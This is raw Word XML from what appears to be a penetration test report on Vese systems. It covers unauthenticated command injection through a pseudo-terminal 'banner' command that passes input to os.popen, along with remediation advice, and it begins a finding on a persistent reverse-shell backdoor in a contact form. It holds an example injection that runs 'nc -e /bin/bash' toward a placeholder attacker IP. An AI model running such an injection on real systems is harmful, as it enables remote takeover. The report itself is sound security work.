          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="1FE95F9E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Attackers can connect to Vese pseudo-terminal without any authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="7BC478F5" w14:textId="5E8C1AE3">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="1FE95F9E">
        <w:drawing>
          <wp:inline wp14:editId="78F958F4" wp14:anchorId="5532EA6D">
            <wp:extent cx="4572000" cy="1762125"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1698045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562b4a371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7825264C" w14:textId="6FC95695">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="1FE95F9E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">There is a </w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="1FE95F9E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>banner</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="1FE95F9E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> command that allows user to set a banner with:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="465CBED1" w14:textId="48F3FBB5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1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>banner –s &lt;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new_banner_name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&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="7DB28501" w14:textId="11578D01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0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>However, this functionality can be abused to make pseudo-terminal execute system commands by adding a semicolon at the end, followed by a command:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="30170D40" w14:textId="6D7A2EF5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1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>banner –s &lt;new_banner_name&gt;; &lt;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system_command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&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="12B004F2" w14:textId="0CCEBA34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1FE95F9E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>banner</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="03255CF4" w14:textId="37362EC8">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="1FE95F9E">
        <w:drawing>
          <wp:inline wp14:editId="14C0FFA0" wp14:anchorId="3CC50BE3">
            <wp:extent cx="4572000" cy="2752725"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1008884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aa7acb523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43D63F16" w14:textId="6D271E8D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0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This allows attackers to execute any system command, like reverse shells, to establish a stable connection. </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="1FE95F9E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve">banner –s New-Banner; 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nc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 xml:space="preserve"> –e /bin/bash &lt;attacker_IP&gt; &lt;attacker_port&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="6EA2A9CC" w14:textId="36BFC007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1FE95F9E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>banner</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="333D8376" w14:textId="7FC9628C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0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>The vulnerability exists in</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="1FE95F9E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> ~/vese-projects-code/pseudo-terminal/switch.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py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1FE95F9E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">file in 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cmd_banner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()</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="1FE95F9E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> function. New banner text is processed directly in the shell with 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os.popen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 xml:space="preserve">() </w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="1FE95F9E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>function:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="75CB073C" w14:textId="6F2CEF4E">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
      </w:pP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cmd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 xml:space="preserve"> = "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figlet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 xml:space="preserve"> {}</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="1FE95F9E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>".format</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="1FE95F9E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>(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self.banner_text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)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="2A5B98DD" w14:textId="61F755FB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1FE95F9E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>return str(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os.popen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(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="1FE95F9E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="1FE95F9E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>).read()</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="1FE95F9E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>).encode</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="1FE95F9E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>('utf-8'), STATUS_ALIVE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="45CAE669" w14:textId="0B51B83F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1FE95F9E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>This allows attackers to inject and execute their commands in a system shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="103E48B0" w14:textId="131C1D98">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="31FD7104" w14:textId="54982252">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="1FE95F9E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3717BE8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7594F74">
            <w:pPr>
              <w:pStyle w:val="FindingTableLabel"/>
              <w:numPr>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Who</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0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CE3CC4D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 xml:space="preserve">IT </w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>Team</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="57C4D39E" w:rsidTr="57C4D39E" w14:paraId="134571D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B4F867D">
            <w:pPr>
              <w:pStyle w:val="FindingTableLabel"/>
              <w:numPr>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/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42A5ACD" w14:textId="04F1E409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Remote</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="57C4D39E" w:rsidTr="57C4D39E" w14:paraId="59208EF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9399A54">
            <w:pPr>
              <w:pStyle w:val="FindingTableLabel"/>
              <w:numPr>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Action</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0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530BF00" w14:textId="51E0B246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</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>: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>R</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>equire user authentication to log in to pseudo-terminal. Additionally, c</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>onsider restricting IP address range</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>s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 that can attempt to connect to the terminal</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="57C4D39E" w:rsidP="57C4D39E" w:rsidRDefault="57C4D39E" w14:noSpellErr="1" w14:paraId="059F193B">
            <w:pPr>
              <w:keepNext w:val="1"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="57C4D39E" w:rsidP="57C4D39E" w:rsidRDefault="57C4D39E" w14:paraId="22CCCA5B" w14:textId="7597B191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2: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>D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o not allow user to call out to OS commands from application-layer code. </w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>R</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>emov</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>ing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code that </w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>format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s 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the </w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>banner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with </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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>os.popen</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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 xml:space="preserve">() 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function </w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>is highly suggested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. If that is not possible, a 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very </w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>strong user input validation must be implemented.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="57C4D39E" w:rsidP="57C4D39E" w:rsidRDefault="57C4D39E" w14:noSpellErr="1" w14:paraId="0731E038">
            <w:pPr>
              <w:keepNext w:val="1"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="57C4D39E" w:rsidP="57C4D39E" w:rsidRDefault="57C4D39E" w14:paraId="55D92E6D" w14:textId="3A148E74">
            <w:pPr>
              <w:keepNext w:val="1"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
              <w:t>A</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
              <w:t>dditional</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
              <w:t>R</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
              <w:t>ecommendations</w:t>
            </w:r>
            <w:r w:rsidR="57C4D39E">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidR="57C4D39E">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="57C4D39E">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>A</w:t>
            </w:r>
            <w:r w:rsidR="57C4D39E">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>pplication seems to allow to connect only one user at a time. If</w:t>
            </w:r>
            <w:r w:rsidR="57C4D39E">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> the</w:t>
            </w:r>
            <w:r w:rsidR="57C4D39E">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="57C4D39E">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>appl</w:t>
            </w:r>
            <w:r w:rsidR="57C4D39E">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">ication </w:t>
            </w:r>
            <w:r w:rsidR="57C4D39E">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">is </w:t>
            </w:r>
            <w:r w:rsidR="57C4D39E">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">supposed </w:t>
            </w:r>
            <w:r w:rsidR="57C4D39E">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>to have more than one connection at a time,</w:t>
            </w:r>
            <w:r w:rsidR="57C4D39E">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> server-side connection handling in </w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="1"/>
                <w:iCs w:val="1"/>
              </w:rPr>
              <w:t xml:space="preserve">terminal.py </w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
              </w:rPr>
              <w:t>file needs to be changed.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="6390ADF6" w14:textId="54982252">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="2A8AF5E2" w14:textId="5A5F0237">
      <w:pPr>
        <w:pStyle w:val="Finding"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="4CED8F11">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">Persistent reverse shell – </w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="4CED8F11">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>13.40.34.151</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="4CED8F11">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Critical)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:noSpellErr="1" w14:paraId="3BAD8658" w14:textId="5DB8055F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33CDB486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65EF407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B4CDBC5" w14:textId="14B6BB1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Backdoor in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contact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form</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="57C4D39E" w:rsidTr="57C4D39E" w14:paraId="2C218A0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3C0A5C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3261FA7" w14:textId="580C32A3">
            <w:pPr>
              <w:keepNext w:val="1"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="C00000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="C00000"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="57C4D39E" w:rsidTr="57C4D39E" w14:paraId="004A23B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1017BAA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27393E3" w14:textId="4EAA094C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5DA31F9F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D44E7B1" w14:textId="58EAA04C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57C4D39E">
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Location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7E8ADC6" w14:textId="54E721C9">
            <w:pPr>
              <w:pStyle w:val="Normal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/home/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>it_consultant</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>vese</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>-projects-code/websites/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>test_comment.php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> and</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="57C4D39E" w:rsidP="57C4D39E" w:rsidRDefault="57C4D39E" w14:paraId="36D205E2" w14:textId="31030AEF">
            <w:pPr>
              <w:pStyle w:val="Normal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http://contact.vese.com/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="57C4D39E" w:rsidTr="57C4D39E" w14:paraId="41E579A4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5CCC8B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663E9C49" w14:textId="134A193A">
            <w:pPr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https://attack.mitre.org/tactics/TA0003/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:noSpellErr="1" w14:paraId="1489973D" w14:textId="132D9F5C">
      <w:pPr>
        <w:pStyle w:val="BodyBlockLine"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="0352642A" w14:textId="5A83927E">
      <w:pPr>
        <w:pStyle w:val="BodyBlockLine"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="4BA56556" w14:textId="0CE568A6">
      <w:pPr>
        <w:pStyle w:val="BodyBlockLine"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="6D73E79F" w14:textId="448AB7EF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="4CED8F11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439B1D7D" w14:textId="4D69DD00">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="2146325F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="20319852">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
